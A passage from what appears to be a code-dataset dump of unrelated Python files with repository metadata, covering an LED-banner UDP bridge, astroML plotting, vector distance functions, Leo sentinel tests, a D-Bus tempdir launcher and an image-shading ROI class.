df[names].droplevel(axis=1, level=1).iloc[:,1:].rolling(100).mean().plot(legend=True, ylabel='Temperature (C)', xlabel='Time', grid='both', figsize=(16,10)).get_figure().savefig(f'{output_path}/{input_file}_TEMP.png',dpi=300, bbox_inches = "tight")
return
if __name__ == '__main__':
main()
| true |
279f357ff3d95b61d165bc80397ba9bd79f16620 | Python | KarolJanik-IS/pp1 | /04-Subroutines/zadanie24.py | UTF-8 | 251 | 3.5 | 4 | [] | no_license | #24
def miesiac(n):
tab = ['Styczeń','Luty','Marzec','Kwiecień','Maj','Czerwiec','Lipiec','Sierpień','Wrzesień','Październik','Listopad','Grudień']
return tab[n-1]
print(f'Miesiąc 7 to {miesiac(7)}')
print(f'Miesiąc 9 to {miesiac(9)}') | true |
dd5eac4e192adbd9d41d384f27fe193b7a5cccd4 | Python | bertrik/lichtkrant | /ledbanner2udp.py | UTF-8 | 1,588 | 3.203125 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python3
"""
Bridge between the revspace ledbanner and a 80x7 scrolling led sign (red-green)
- accepts revspace ledbanner frames (80x8 pixels raw RGB) from stdin
- copies each frame to stdout
- converts each frame to 80x8 pixels rgb565 which is sent using UDP to a host on the network
"""
import sys
import argparse
import socket
def rgb888_to_rgb565(rgb):
r, g, b = rgb
rgb565 = ((r << 8) & 0xF800) | ((g << 3) & 0x07E0) | ((b >> 3) & 0x001F)
return rgb565.to_bytes(2, byteorder='big')
def convert_frame(data):
""" Converts the supplied rgb888 frame and returns a rgb565 frame """
num = len(data) // 3
out = bytearray(2 * num)
pi = po = 0
for i in range(0, num):
rgb888 = data[pi:pi+3]
pi += 3
out[po:po+2] = rgb888_to_rgb565(rgb888)
po += 2
return out
def main():
""" The main entry point """
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--ip", type=str, help="The UDP host ip", default="localhost")
parser.add_argument("-p", "--port", type=int, help="The UDP host port", default="1565")
args = parser.parse_args()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while True:
# read ledbanner frame from stdin
data = sys.stdin.buffer.read(80*8*3)
if len(data) != 80*8*3:
break
# copy to stdout
sys.stdout.buffer.write(data)
# convert
frame = convert_frame(data)
# send over UDP
s.sendto(frame, (args.ip, args.port))
if __name__ == "__main__":
main()
| true |
61f35c0fd2ee1b8e036a5ac6ea9da89579db110d | Python | astroML/astroML_figures | /book_figures/chapter5/fig_posterior_cauchy.py | UTF-8 | 4,268 | 3.09375 | 3 | [
"BSD-2-Clause"
] | permissive | """
Posterior for Cauchy Distribution
---------------------------------
Figure 5.11
The solid lines show the posterior pdf :math:`p(\mu|{x_i},I)` (top-left panel)
and the posterior pdf :math:`p(\gamma|{x_i},I)` (top-right panel) for the
two-dimensional pdf from figure 5.10. The dashed lines show the distribution
of approximate estimates of :math:`\mu` and :math:`\gamma` based on the median
and interquartile range. The bottom panels show the corresponding cumulative
distributions.
"""
# Author: Jake VanderPlas
# License: BSD
# The figure produced by this code is published in the textbook
# "Statistics, Data Mining, and Machine Learning in Astronomy" (2013)
# For more information, see http://astroML.github.com
# To report a bug or issue, use the following forum:
# https://groups.google.com/forum/#!forum/astroml-general
import numpy as np
from matplotlib import pyplot as plt
from scipy.stats import cauchy
from astroML.stats import median_sigmaG
from astroML.resample import bootstrap
#----------------------------------------------------------------------
# This function adjusts matplotlib settings for a uniform feel in the textbook.
# Note that with usetex=True, fonts are rendered with LaTeX. This may
# result in an error if LaTeX is not installed on your system. In that case,
# you can set usetex to False.
if "setup_text_plots" not in globals():
from astroML.plotting import setup_text_plots
setup_text_plots(fontsize=8, usetex=True)
def cauchy_logL(x, gamma, mu):
"""Equation 5.74: cauchy likelihood"""
x = np.asarray(x)
n = x.size
# expand x for broadcasting
shape = np.broadcast(gamma, mu).shape
x = x.reshape(x.shape + tuple([1 for s in shape]))
return ((n - 1) * np.log(gamma)
- np.sum(np.log(gamma ** 2 + (x - mu) ** 2), 0))
def estimate_mu_gamma(xi, axis=None):
"""Equation 3.54: Cauchy point estimates"""
q25, q50, q75 = np.percentile(xi, [25, 50, 75], axis=axis)
return q50, 0.5 * (q75 - q25)
#------------------------------------------------------------
# Draw a random sample from the cauchy distribution, and compute
# marginalized posteriors of mu and gamma
np.random.seed(44)
n = 10
mu_0 = 0
gamma_0 = 2
xi = cauchy(mu_0, gamma_0).rvs(n)
gamma = np.linspace(0.01, 5, 70)
dgamma = gamma[1] - gamma[0]
mu = np.linspace(-3, 3, 70)
dmu = mu[1] - mu[0]
likelihood = np.exp(cauchy_logL(xi, gamma[:, np.newaxis], mu))
pmu = likelihood.sum(0)
pmu /= pmu.sum() * dmu
pgamma = likelihood.sum(1)
pgamma /= pgamma.sum() * dgamma
#------------------------------------------------------------
# bootstrap estimate
mu_bins = np.linspace(-3, 3, 21)
gamma_bins = np.linspace(0, 5, 17)
mu_bootstrap, gamma_bootstrap = bootstrap(xi, 20000, estimate_mu_gamma,
kwargs=dict(axis=1), random_state=0)
#------------------------------------------------------------
# Plot results
fig = plt.figure(figsize=(5, 5))
fig.subplots_adjust(wspace=0.35, right=0.95,
hspace=0.2, top=0.95)
# first axes: mu posterior
ax1 = fig.add_subplot(221)
ax1.plot(mu, pmu, '-k')
ax1.hist(mu_bootstrap, mu_bins, density=True,
histtype='step', color='b', linestyle='dashed')
ax1.set_xlabel(r'$\mu$')
ax1.set_ylabel(r'$p(\mu|x,I)$')
# second axes: mu cumulative posterior
ax2 = fig.add_subplot(223, sharex=ax1)
ax2.plot(mu, pmu.cumsum() * dmu, '-k')
ax2.hist(mu_bootstrap, mu_bins, density=True, cumulative=True,
histtype='step', color='b', linestyle='dashed')
ax2.set_xlabel(r'$\mu$')
ax2.set_ylabel(r'$P(<\mu|x,I)$')
ax2.set_xlim(-3, 3)
# third axes: gamma posterior
ax3 = fig.add_subplot(222, sharey=ax1)
ax3.plot(gamma, pgamma, '-k')
ax3.hist(gamma_bootstrap, gamma_bins, density=True,
histtype='step', color='b', linestyle='dashed')
ax3.set_xlabel(r'$\gamma$')
ax3.set_ylabel(r'$p(\gamma|x,I)$')
ax3.set_ylim(-0.05, 1.1)
# fourth axes: gamma cumulative posterior
ax4 = fig.add_subplot(224, sharex=ax3, sharey=ax2)
ax4.plot(gamma, pgamma.cumsum() * dgamma, '-k')
ax4.hist(gamma_bootstrap, gamma_bins, density=True, cumulative=True,
histtype='step', color='b', linestyle='dashed')
ax4.set_xlabel(r'$\gamma$')
ax4.set_ylabel(r'$P(<\gamma|x,I)$')
ax4.set_ylim(-0.05, 1.1)
ax4.set_xlim(0, 4)
plt.show()
| true |
831721662feacc5d0251aa694a43ecd3eeab7c31 | Python | connesy/ProjectEuler | /python/problem016/problem016.py | UTF-8 | 223 | 2.9375 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
@author: Stefan Mejlgaard
"""
from python.utils.number_utils import digit_sum
if __name__ == "__main__":
result = digit_sum(2**15)
print(result)
result = digit_sum(2**1000)
print(result)
| true |
b1fd9dd8455f946e432a88b96ef6ff41e26b51ee | Python | dpsnewailab/DPS_Util | /dpsutil/vector/distance.py | UTF-8 | 1,849 | 3.109375 | 3 | [
"MIT"
] | permissive | import numpy
def normalize_L1(x):
return x / numpy.linalg.norm(x)
def normalize_L2(x):
assert isinstance(x, numpy.ndarray)
return x / numpy.sqrt(numpy.sum((x ** 2), keepdims=True, axis=1))
def cosine_similarity(x1, x2, skip_normalize=False):
if type(x1) is list:
x1 = numpy.array(x1)
if type(x2) is list:
x2 = numpy.array(x2)
assert type(x1) is numpy.ndarray or type(x2) is numpy.ndarray
assert x1.shape == x2.shape
assert len(x1.shape) <= 2
if not skip_normalize:
if len(x1.shape) == 2:
x1 = normalize_L2(x1)
x2 = normalize_L2(x2)
else:
x1 = normalize_L1(x1)
x2 = normalize_L1(x2)
return numpy.dot(x1, x2.T)
def cosine(x1, x2, skip_normalize=False):
return 1 - cosine_similarity(x1, x2, skip_normalize=skip_normalize)
def euclidean_distance(x1, x2):
if type(x1) is list:
x1 = numpy.array(x1)
if type(x2) is list:
x2 = numpy.array(x2)
assert type(x1) is numpy.ndarray or type(x2) is numpy.ndarray
assert x1.shape == x2.shape
assert len(x1.shape) <= 2
if len(x1.shape) == 1:
return numpy.sqrt(numpy.sum((x1 - x2) ** 2))
return numpy.sqrt(numpy.sum((x1[:, numpy.newaxis, :] - x2[numpy.newaxis, :, :]) ** 2, axis=-1))
def cosim2euclid(cosim):
"""
Convert cosine similarity -> normalized euclidean distance
:return:
"""
return numpy.sqrt(cosim)
def euclid2cosim(euclid_dis):
"""
Convert normalized euclidean distance -> cosine similarity
:return:
"""
return euclid_dis ** 2
def absolute_distance(x1, x2):
return numpy.sum(numpy.absolute(x1 - x2))
__all__ = ['normalize_L1', 'normalize_L2', 'cosine_similarity', 'cosine', 'euclidean_distance',
'cosim2euclid', 'euclid2cosim', 'absolute_distance']
| true |
ba2377fa2d46741681b09f88639a20d23b3929a2 | Python | leo-editor/leo-editor-contrib | /Projects/From Bernhard Mulder/MulderSentinelScript/test_sentinels.py | UTF-8 | 13,720 | 2.84375 | 3 | [] | no_license | #@+leo-ver=4
#@+node:@file test_sentinels.py
#@+others
#@+node:imports
import os
from unittest import TestCase, TestSuite, TextTestRunner
import sentinel
import shutil
#@-node:imports
#@+node:class sentinel_test
class sentinel_test(TestCase):
#@ @+others
#@+node:setUp
def setUp(self):
self.prefix = ["#@+leo-ver=4\n",
"#@+node:@file sentinel.py\n",
"#@@language python\n"]
self.postfix = ["#@-node:@file sentinel.py\n",
"#@-leo\n"]
#@-node:setUp
#@+node:setup_inputfile
def setup_inputfile(self, input):
classname = self.__class__.__name__
self.input_filename = os.path.join('test/s_%s.txt' % classname)
self.output_filename = os.path.join('test/d_%s.txt' % classname)
outfile = file(self.input_filename, "w")
for line in input:
outfile.write(line)
outfile.close()
#@-node:setup_inputfile
#@+node:setup_configfile
def setup_configfile(self):
self.configfilename = "test/sentinel.cfg"
outfile = file(self.configfilename, "w")
outfile.write("[sentinel]\n")
outfile.write("\ns1=%s\n" % self.input_filename)
outfile.write("\nd1=%s\n" % self.output_filename)
outfile.close()
#@-node:setup_configfile
#@-others
#@nonl
#@-node:class sentinel_test
#@+node:class insert_test
class insert_test(sentinel_test):
#@ @+others
#@+node:setUp
def setUp(self):
sentinel_test.setUp(self)
self.setup_inputfile(self.prefix +
["Proof of concept implementation of sentinel free LEO files.\n",
"We try to insert a line after here\n",
"This should be after the inserted line\n",
"This should be the last line in the file\n"]
+ self.postfix)
# here are the same lines, without sentinels
self.lines = ["Proof of concept implementation of sentinel free LEO files.\n",
"We try to insert a line after here\n",
"This should be after the inserted line\n",
"This should be the last line in the file\n"]
self.setup_configfile()
#@-node:setUp
#@+node:runTest
def runTest(self):
"""
Insert a line in a file without sentinels of a file derived of a file with sentinels, and make sure that this line is inserted in the proper place.
"""
# First, produce the sentinel free output.
sentinel.main(self.configfilename, "push")
# Verify this first step.
assert os.path.exists(self.output_filename)
assert file(self.output_filename).readlines() == self.lines
# then insert one line in the sentinel free output.
lines = self.lines
lines[2:2] = ["This is an inserted line\n"]
outfile = file(self.output_filename, "w")
for line in lines:
outfile.write(line)
outfile.close()
# get the sources back.
sentinel.main(self.configfilename, "pull")
# re-generate the output.
sentinel.main(self.configfilename, "push")
# and check for equality.
assert file(self.output_filename).readlines() == lines
#@-node:runTest
#@-others
#@nonl
#@-node:class insert_test
#@+node:class replace_test
class replace_test(sentinel_test):
"""
Replace a single line.
"""
#@ @+others
#@+node:setUp
def setUp(self):
sentinel_test.setUp(self)
self.lines = [
"Proof of concept implementation of sentinel free LEO files.\n",
"This line should be replaced\n",
"This should be the last line in the file\n"]
self.setup_inputfile(self.prefix + self.lines + self.postfix)
# here are the same lines, without sentinels
self.setup_configfile()
#@-node:setUp
#@+node:runTest
def runTest(self):
"""
Insert a line in a file without sentinels of a file derived of a file with sentinels, and make sure that this line is inserted in the proper place.
"""
# First, produce the sentinel free output.
sentinel.main(self.configfilename, "push")
# Verify this first step.
assert os.path.exists(self.output_filename)
assert file(self.output_filename).readlines() == self.lines
# then insert one line in the sentinel free output.
lines = self.lines
lines[2:2] = ["This is a replaced line\n"]
outfile = file(self.output_filename, "w")
for line in lines:
outfile.write(line)
outfile.close()
# get the sources back.
sentinel.main(self.configfilename, "pull")
# re-generate the output.
sentinel.main(self.configfilename, "push")
# and check for equality.
assert file(self.output_filename).readlines() == lines
#@-node:runTest
#@-others
#@nonl
#@-node:class replace_test
#@+node:class replace_test2
class replace_test2(sentinel_test):
"""
Replace two lines.
"""
#@ @+others
#@+node:setUp
def setUp(self):
sentinel_test.setUp(self)
self.lines = [
"Line 0\n", #0
" Line 1\n", #1
" Line 2.\n", #2
" Line 3.\n", #3
" Line 4\n", #4
"\n", #5
" We have two subclasses:\n", #6
" single_clss represents a (condition, register) => (expression_number, linenumber) mapping.\n", #7
" set_class represents a set of (condition, register) => (expression_number, linenumber) mapping.\n", #8
"\n", #9
" Line 10\n", #10
" Line 11\n" #11
]
self.setup_inputfile(self.prefix + self.lines + self.postfix)
# here are the same lines, without sentinels
self.setup_configfile()
#@-node:setUp
#@+node:runTest
def runTest(self):
"""
Insert a line in a file without sentinels of a file derived of a file with sentinels, and make sure that this line is inserted in the proper place.
"""
# First, produce the sentinel free output.
sentinel.main(self.configfilename, "push")
# Verify this first step.
assert os.path.exists(self.output_filename)
assert file(self.output_filename).readlines() == self.lines
# then insert two lines in the sentinel free output.
lines = self.lines
lines[7:9] = [" single_class represents a (condition, register) => (expression_number, linenumber) mapping.\n", #7
" set_class represents a set of (condition, register) => (expression_number, linenumber) mappings.\n", #8
]
outfile = file(self.output_filename, "w")
for line in lines:
outfile.write(line)
outfile.close()
# get the sources back.
sentinel.main(self.configfilename, "pull")
# re-generate the output.
sentinel.main(self.configfilename, "push")
# and check for equality.
assert file(self.output_filename).readlines() == lines
#@-node:runTest
#@-others
#@nonl
#@-node:class replace_test2
#@+node:class replace_test3
class replace_test3(sentinel_test):
"""
Replace the lines of a whole node.
"""
#@ @+others
#@+node:setUp
def setUp(self):
sentinel_test.setUp(self)
self.lines = [
"#@+node:main\n",
"node 1: line 1\n", # 1
"node 1: line 2\n", # 2
"#@-node:main\n",
"#@-others\n",
"node 2: line 3\n", # 3
"node 2: line 4\n", # 4
"#@-node:@file sentinel.py\n",
]
self.setup_inputfile(self.prefix + self.lines + self.postfix)
# here are the same lines, without sentinels
self.setup_configfile()
#@-node:setUp
#@+node:runTest
def runTest(self):
"""
Insert a line in a file without sentinels of a file derived of a file with sentinels, and make sure that this line is inserted in the proper place.
"""
# First, produce the sentinel free output.
sentinel.main(self.configfilename, "push")
# Verify this first step.
assert os.path.exists(self.output_filename)
filtered_lines = sentinel.push_filter_lines(self.lines)[0]
assert file(self.output_filename).readlines() == filtered_lines
# then insert one line in the sentinel free output.
filtered_lines [2:4] = [ "These lines should be totally different\n",
"and be replaced across sentinel blocks,\n",
]
outfile = file(self.output_filename, "w")
for line in filtered_lines:
outfile.write(line)
outfile.close()
# get the sources back.
sentinel.main(self.configfilename, "pull")
# re-generate the output.
sentinel.main(self.configfilename, "push")
# and check for equality.
assert file(self.output_filename).readlines() == filtered_lines
#@-node:runTest
#@-others
#@nonl
#@-node:class replace_test3
#@+node:class replace_test4
class replace_test4(sentinel_test):
"""
Replace the lines of a whole node.
"""
#@ @+others
#@+node:setUp
def setUp(self):
sentinel_test.setUp(self)
self.lines = [
"#@+node:main\n",
"node 1: line 1\n", # 1
"node 1: line 2\n", # 2
"#@-node:main\n",
"#@-others\n",
"node 2: line 3\n", # 3
"node 2: line 4\n", # 4
"#@-node:@file sentinel.py\n",
]
self.setup_inputfile(self.prefix + self.lines + self.postfix)
# here are the same lines, without sentinels
self.setup_configfile()
#@-node:setUp
#@+node:runTest
def runTest(self):
"""
Insert a line in a file without sentinels of a file derived of a file with sentinels, and make sure that this line is inserted in the proper place.
"""
# First, produce the sentinel free output.
sentinel.main(self.configfilename, "push")
# Verify this first step.
assert os.path.exists(self.output_filename)
filtered_lines = sentinel.push_filter_lines(self.lines)[0]
assert file(self.output_filename).readlines() == filtered_lines
# then insert one line in the sentinel free output.
filtered_lines [1:3] = [ "These lines should be totally different\n",
"and be replaced across sentinel blocks,\n",
]
outfile = file(self.output_filename, "w")
for line in filtered_lines:
outfile.write(line)
outfile.close()
# get the sources back.
sentinel.main(self.configfilename, "pull")
# re-generate the output.
sentinel.main(self.configfilename, "push")
# and check for equality.
assert file(self.output_filename).readlines() == filtered_lines
#@-node:runTest
#@-others
#@nonl
#@-node:class replace_test4
#@+node:regression tests
#@+doc
# these are tests representing errors which I encountered during the
# development of the code.
#@-doc
#@nonl
#@-node:regression tests
#@+node:class regression_test_1
class regression_test_1(sentinel_test):
"""
Replace a single line.
"""
#@ @+others
#@+node:setUp
def setUp(self):
self.lines = [
"#@+leo-ver=4\n",
"#@+node:@file driver.py\n",
"#@@language python\n",
"#@+others\n",
"#@+node:imports\n",
"# Analyse an IA64 assembly file:\n",
"# 1. Identify basic blocks.\n",
"# 2. Track the contents of registers symbolically.\n",
"import os, sys, cmp_globals\n",
"\n",
"#@-node:imports\n",
"#@+node:process_file\n",
"def process_file(infile, pyname_full, configfile, firststep, laststep):\n",
" \n",
" proc()\n",
"#@nonl\n",
"#@-node:process_file\n",
"#@-others\n",
"#@-node:@file driver.py\n",
"#@-leo\n"
]
self.setup_inputfile(self.lines)
# here are the same lines, without sentinels
self.setup_configfile()
#@-node:setUp
#@+node:runTest
def runTest(self):
"""
Insert a line in a file without sentinels of a file derived of a file with sentinels, and make sure that this line is inserted in the proper place.
"""
# First, produce the sentinel free output.
sentinel.main(self.configfilename, "push")
# Verify this first step.
assert os.path.exists(self.output_filename)
assert file(self.output_filename).readlines() == sentinel.push_filter_lines(self.lines)[0]
# get the sources back.
sentinel.main(self.configfilename, "pull")
# Now check that the source has not been changed.
assert file(self.input_filename).readlines() == self.lines
#@-node:runTest
#@-others
#@nonl
#@-node:class regression_test_1
#@+node:main
if __name__ == '__main__':
#fileName = os.path.join(os.getcwd(),"testing.ini")
#config = ConfigParser.ConfigParser()
#config.read(fileName)
#main = "Main"
#leodir = config.get(main, "leodir")
#test_to_run = config.get(main, "test_to_run")
test_to_run = 'all'
if os.path.exists("test"):
shutil.rmtree("test")
os.mkdir("test")
suite = TestSuite()
if test_to_run == 'all':
for testclass in (
insert_test,
replace_test,
replace_test2,
replace_test3,
regression_test_1,
):
suite.addTest(testclass())
else:
suite.addTest(globals()[test_to_run]())
testrunner = TextTestRunner()
testrunner.run(suite)
#@nonl
#@-node:main
#@-others
#@nonl
#@-node:@file test_sentinels.py
#@-leo
| true |
e2610b99af5b03f762a7d99e5c11366933dcc7b8 | Python | TheRealMolen/ucorruption | /cpu.py | UTF-8 | 266 | 2.625 | 3 | [] | no_license |
asm1 = '12c334401111'
asm2 = '0410'
addr = 0x4400
for i in range(0,len(asm1),4):
print 'let %04x=%s%s; ' % (addr, asm1[i+2:i+4], asm1[i:i+2]),
addr += 2
for i in range(9):
print 'let %04x=%s%s; ' % (addr, asm2[2:], asm2[:2]),
addr += 2
print ''
| true |
817ebb497633f653b77a27579eef6a00b8b53010 | Python | YiZeng623/Advanced-Gradient-Obfuscating | /utils.py | UTF-8 | 2,836 | 2.578125 | 3 | [
"MIT"
] | permissive | import PIL.Image
from imagenet_labels import label_to_name
import matplotlib.pyplot as plt
from defense import *
# Some of the code refering to Anish & Carlini's github: https://github.com/anishathalye/obfuscated-gradients
def getabatch(dataset,labelset,numbatch,batchsize):
databatch = dataset[numbatch*batchsize:(numbatch*batchsize+batchsize)]
labelbatch = labelset[numbatch*batchsize:(numbatch*batchsize+batchsize)]
return databatch,labelbatch
def linf_distortion(img1, img2):
if len(img1.shape) == 4:
n = img1.shape[0]
l = np.mean(np.max(np.abs(img1.reshape((n, -1)) - img2.reshape((n, -1))), axis=1), axis=0)
else:
l = np.max(np.abs(img1 - img2))
return l
def l2_distortion(img1, img2):
if len(img1.shape) == 4:
n = img1.shape[0]
l = np.mean(np.sqrt(np.sum((img1.reshape((n, -1)) - img2.reshape((n, -1)))
** 2, axis=1) / np.product(img1.shape[1:])), axis=0)
else:
l = np.sqrt(np.sum((img1 - img2) ** 2) / np.product(img1.shape))
return l
def one_hot(index, total):
arr = np.zeros((total))
arr[index] = 1.0
return arr
def optimistic_restore(session, save_file):
reader = tf.train.NewCheckpointReader(save_file)
saved_shapes = reader.get_variable_to_shape_map()
var_names = sorted([(var.name, var.name.split(':')[0]) for var in tf.global_variables()
if var.name.split(':')[0] in saved_shapes])
restore_vars = []
with tf.variable_scope('', reuse=True):
for var_name, saved_var_name in var_names:
curr_var = tf.get_variable(saved_var_name)
var_shape = curr_var.get_shape().as_list()
if var_shape == saved_shapes[saved_var_name]:
restore_vars.append(curr_var)
saver = tf.train.Saver(restore_vars)
saver.restore(session, save_file)
def load_image(path):
return (np.asarray(PIL.Image.open(path).resize((299, 299)))/255.0).astype(np.float32)
def make_classify(sess, input_, probs):
def classify(img, correct_class=None, target_class=None):
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(10, 8))
fig.sca(ax1)
p = sess.run(probs, feed_dict={input_: img})[0]
ax1.imshow(img)
fig.sca(ax1)
topk = list(p.argsort()[-10:][::-1])
topprobs = p[topk]
barlist = ax2.bar(range(10), topprobs)
if target_class in topk:
barlist[topk.index(target_class)].set_color('r')
if correct_class in topk:
barlist[topk.index(correct_class)].set_color('g')
plt.sca(ax2)
plt.ylim([0, 1.1])
plt.xticks(range(10),
[label_to_name(i)[:15] for i in topk],
rotation='vertical')
fig.subplots_adjust(bottom=0.2)
plt.show()
return classify
| true |
0f86450b9bb57ea661d2b89dc73b1814019e5c05 | Python | fishface60/tempdird | /with-tempdir | UTF-8 | 3,158 | 2.53125 | 3 | [
"ISC"
] | permissive | #!/usr/bin/python
#Copyright (c) 2015, Richard Maw <richard.maw@gmail.com>
#
#Permission to use, copy, modify, and/or distribute this software for any
#purpose with or without fee is hereby granted, provided that the above
#copyright notice and this permission notice appear in all copies.
#
#THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
#WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
#MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
#ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
#WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
#ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
#OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
'''Run a subprocess with a tempdir
Requests a tempdir from a 'name.maw.richard.tempd0' service, by talking to
a D-Bus service specified by --bus-name and --bus-object-path, and starts
a subprocess with the directory file descriptor still open on a file
descriptor referred to by the environment variable specified by --fd-env-var,
or replaces arguments equal to --fd-template.
'''
__version__ = (0, 0)
import argparse
import os
import subprocess
import sys
import dbus
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--version', action='version',
version='%(prog)s ' + '.'.join(map(str, __version__)))
parser.add_argument('--bus-name', default='name.maw.richard.tempd0',
help='Bus peer address to request tempdir from')
parser.add_argument('--bus-object-path', default='/name/maw/richard/tempd',
help='Object path of service in Bus peer')
parser.add_argument('--dir-prefix', default=None, type=str,
help='Prefix to name of tempdir to create')
parser.add_argument('--dir-suffix', default=None, type=str,
help='Suffix to name of tempdir to create')
parser.add_argument('--fd-env-var', default='TEMPDIR_FD',
help='Environment variable to store tempdir fd number in')
parser.add_argument('--fd-template', default=None, type=str,
help='Replace args equal to this with tempdir fd number')
parser.add_argument('argv', nargs='+',
help='Command to run with tempdir')
options = parser.parse_args()
bus = dbus.SessionBus()
temp_manager = bus.get_object(options.bus_name,
options.bus_object_path)
tempd = dbus.Interface(temp_manager,
dbus_interface='name.maw.richard.tempd0')
temp_dir, fifo_write = tempd.make_tempdir(options.dir_suffix or "",
options.dir_prefix or "")
temp_dir_fd, fifo_write_fd = temp_dir.take(), fifo_write.take()
env = dict(os.environ)
if options.fd_env_var:
env[options.fd_env_var] = str(temp_dir_fd)
if options.fd_template is None:
argv = options.argv
else:
argv = [str(temp_dir_fd) if arg == options.fd_template else arg
for arg in options.argv]
sys.exit(subprocess.call(argv, env=env,
preexec_fn=lambda: os.close(fifo_write_fd)))
| true |
d6cf90ea05b97dbd140f33e5aed4df41728e4a4a | Python | priyapsakthivel/hello_python | /python_learn/Odd_even.py | UTF-8 | 284 | 4 | 4 | [] | no_license | number1=int(input("please enter an number"))
number2=int(input("please enter a second number"))
if (number1%2==0):
print("its an even number")
else:
print("the given number is odd")
if (number2%2==0):
print("its an even number")
else:
print("the given number is odd") | true |
d273646d9ed18244bb92c4dafb8315dc2a25fe93 | Python | charluz/cyPython | /image_shading/cyPyModules/image_shading.py | UTF-8 | 23,828 | 3.109375 | 3 | [] | no_license | #!/usr/bin/python
import os, sys
import numpy as np
import cv2
if __name__ == "__main__":
import image_ROI as ROI
else:
import cyPyModules.image_ROI as ROI
#--------------------------------------
# Class: ImageShading
#--------------------------------------
class ImageShading():
"""A class to define the Luma/Chroma shading operation of an given image.
Attributes
--------------
gShadingINFO: dict
A dictionary acting as a list to store information of each shading rectangle.
The shading rectangles have been named as:
* Co: the center rectangle
* Q1/Q2/Q3/Q3: the diagonal rectangles, where Q1 represents the 1st quadrant.
* Hr/Hl: the horizontal rectangles, where Hr:right, Hl:left
* Vt/Vb: the vertical rectangles, where Vt:top, Vb:bottom
The format of gShadingINFO is defined:
{ nameID:gShadingRect, }
Methods
---------------
set_property()
"""
def __init__(self, imgW, imgH):
"""Initialize all shading rectangles
Arguments
------------
imgW, imgH: integer
the size of the source image
Returns
--------------
None
"""
self._property = {
'c_size_ratio' : 0.1,
'e_size_ratio' : 0.1,
'd_field' : 1.0,
'hv_field' : 1.0,
}
#-- store global variables
self.gImgW = imgW
self.gImgH = imgH
self.gShadingINFO = {}
#-- derive image center coordinate
self.gImgXc = int(imgW / 2)
self.gImgYc = int(imgH / 2)
self.gCRoiW = int(imgW * self._property['c_size_ratio'])
self.gCRoiH = int(imgH * self._property['c_size_ratio'])
self.gERoiW = int(imgW * self._property['e_size_ratio'])
self.gERoiH = int(imgH * self._property['e_size_ratio'])
#-- create the ROI list
self.gShadingRECT = ROI.ImageROI(imgW, imgH)
self._create_shading_rectangles()
def set_property(self, **kwargs):
"""Set properities of the image shading.
The property is specified with the format: propt_name=value
For example, c_size=0.1
Arguments
--------------
c_size_ratio: float
* the value is specified as the proportional value of the center rectangle to the image
* value = (width/height of the center rectangle) / (width/height of the image)
* ranges from 0.05 to 0.3 (5% to 30%)
e_size_ratio: float
* the proportional value of the edge (diagonal, top/bottom, left/right) rectangle to the image
* reanges from 0.05 to 0.2 (5% to 20%)
d_field: float
* the image field of the diagonal rectangles
* ranges from 0.3 to 1.0
hv_field: float
* the image field of the horizontal/vertical rectangles
* ranges from 0.3 to 1.0
h_enable: boolean
Enable/Disable horizontal shading (Hr, Hl) verification
v_enable: boolean
Enable/Disable vertical shading (Vt, Vb) verification
luma_enable: boolean
Enable/Disable luma shading verification
chroma_enable: boolean
Enable/Disable chroma shading verification
"""
for argkey, argval in kwargs.items():
#print(argkey, '= ', argval)
if argkey == 'c_size_ratio':
self._property[argkey] = argval # size proportional value of center rectangle to source image
elif argkey == 'e_size_ratio':
self._property[argkey] = argval # size proportional value of corner rectangles to source image
elif argkey == 'd_field':
self._property[argkey] = argval # the image field ratio of the diagonal rectangles to the center's
elif argkey == 'hv_field':
self._property[argkey] = argval # the image field ratio of the H/V rectangles to the center's
elif argkey == 'h_enable':
self._property[argkey] = argval # the image field ratio of the H/V rectangles to the center's
elif argkey == 'v_enable':
self._property[argkey] = argval # the image field ratio of the H/V rectangles to the center's
elif argkey == 'luma_enable':
self._property[argkey] = argval # the image field ratio of the H/V rectangles to the center's
elif argkey == 'chroma_enable':
self._property[argkey] = argval # the image field ratio of the H/V rectangles to the center's
else:
pass
def _set_QHV_rect(self, rect_name, Po, Pv, fraction):
"""
"""
x, y = ROI.interpolateXY(Po, Pv, fraction)
#print(rect_name, ": Po= ", Po, " Pv= ", Pv, " P= ", (x, y))
self.gShadingRECT.add(rect_name, (x, y), (self.gERoiW, self.gERoiH))
def _create_shading_rectangles(self):
"""To initialize all shadning rectangles
"""
#-- Center: Co
rect_name='Co'
self.gShadingRECT.add(rect_name, (self.gImgXc, self.gImgYc), (self.gCRoiW, self.gCRoiH))
Po = (self.gImgXc, self.gImgYc)
#-- Quadrants: Q1, Q2, Q3, Q4
fraction = self._property['d_field']
Q1param = { 'name':'Q1', 'Pv':(self.gImgW, 0) }
Q2param = { 'name':'Q2', 'Pv':(0, 0) }
Q3param = { 'name':'Q3', 'Pv':(0, self.gImgH) }
Q4param = { 'name':'Q4', 'Pv':(self.gImgW, self.gImgH) }
Qplist = [ Q1param, Q2param, Q3param, Q4param ]
for Qp in Qplist:
self._set_QHV_rect(Qp['name'], Po, Qp['Pv'], fraction)
#-- Latitude (Horizontal): Hr(right), Hl(left)
fraction = self._property['hv_field']
Hrparam = { 'name':'Hr', 'Pv':(self.gImgW, int(self.gImgH/2)) }
Hlparam = { 'name':'Hl', 'Pv':(0, int(self.gImgH/2)) }
Hplist = [ Hrparam, Hlparam ]
for Hp in Hplist:
self._set_QHV_rect(Hp['name'], Po, Hp['Pv'], fraction)
#-- Longitude (Vertical): Vt(top), Vb(bottom)
Vtparam = { 'name':'Vt', 'Pv':(int(self.gImgW/2), 0) }
